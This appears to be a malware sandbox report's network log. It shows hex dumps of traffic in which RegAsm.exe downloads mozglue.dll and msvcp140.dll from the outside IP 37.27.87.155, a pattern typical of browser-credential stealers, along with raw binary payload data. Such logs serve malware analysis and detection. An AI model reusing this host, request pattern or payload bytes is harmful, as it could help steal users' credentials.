                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                                                                                Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                                                                                Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                                                                                Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:15 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:15 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                                                                                Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:15 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                12192.168.2.44974537.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:16 UTC156OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:16 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:16 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                Content-Length: 608080
                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:16 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:16 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                                                                                Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                                                                                Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                                                                                Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                                                                                Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                                                                                Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                                                                                Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                                                                                Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                                                                                Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:17 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                                                                                Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                13192.168.2.44974837.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:18 UTC157OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:18 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                Content-Length: 450024
                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                                                                                Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
